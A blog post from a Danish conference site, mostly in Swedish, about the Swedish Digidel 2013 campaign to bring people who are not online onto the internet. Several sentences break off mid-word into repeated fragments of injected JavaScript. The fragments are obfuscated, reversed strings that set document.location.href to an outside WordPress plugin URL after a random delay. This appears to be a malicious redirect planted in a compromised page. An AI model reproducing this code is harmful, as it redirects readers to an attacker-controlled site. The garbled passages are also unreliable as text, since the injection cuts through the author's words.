Digidel – kampagne for digital inklusion

Som opvarmning til “Sharing is Caring 2012 – Let’s Get Real” blogger en række af speakerne om deres arbejde med deling og åbenhed her på formidlingsnettet.

Dette blogindlæg er skrevet af Ellen Pettersson, en af vores ignite speakers. Hun er kommunikationsmedarbejder i den svenske Digidel-kampagne, der arbejder for inklusion i det digitaliserede samfund. Følg kampagnen på @digidel2013. Ellen selv tweeter på @mediepedagog

Ellen Pettersson er kommukationsmedarbejder i Digidel-kampagnen

Digidel 2013 är en kampanj som vill få fler att kunna, vilja och våga använda Internet. Vi upplever ett paradigmskifte från en analog till en digital tid där vi med Internet ges möjlighet att på nya sätt kommunicera, göra affärer och organisera samhället.

I norden är användandet av Internet högt. För ju fler människor som besöker eller mer och mer “bosätter” sig på nätet, destoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to fler verksamheter och företag packar ihop den fysiska butiken och flyttar fokus mot att finnas tillgängliga på webben 24 timmar om dygnet.

Men alla är inte på Internet. Rapporten Svenskarna och Internet 2012 visar att 1,2 miljoner svenskar över 12 år inte är med på nätet. De är många gånger äldre, men inte bara de allra, allra äldsta utan också personer med kort utbildning, lite i plånboken, funktionsnedsättningar eller språksvårigheter. För dessa personer kan Internet vara ett stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort hinder och inte alls så enkelt och snabbt som den Internetvana gärna vill tro. Samtidigt så kan kunskap om nätet erbjuda fantastiska möjligheter för att söka bostad, arbete och för att höras med nära och kära.

Digidel är något så härligt som ett nätverk för alla som vill att vi även i ett digitalt samhälle ska ge alla möjligheten att göra sin röst hörd. Nätverket består av aktörerfrån offentlig- privat- och ideell sektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor plus ett antal privatpersoner. Alla gör en konkret insats för att få med fler på nätet genom att utbilda, ge support, anordna evenemang eller samordna fler aktörer. Gemensamt för alla aktörer är viljan att dela med sig av nytta och nöje med Internet. Målet är att innan kampanjen är slut tillsammans nå målet, 500 000 fler ut på nätet.

Andre indlæg relateret til “Sharing is Caring”

2 comments to “Digidel – kampagne for digital inklusion”
  1. Pingback: A year of sharing and caring | Formidlingsnet

  2. Pingback: Sharing is Caring 2012 – Let’s Get Real! Program | Formidlingsnet

Skriv et svar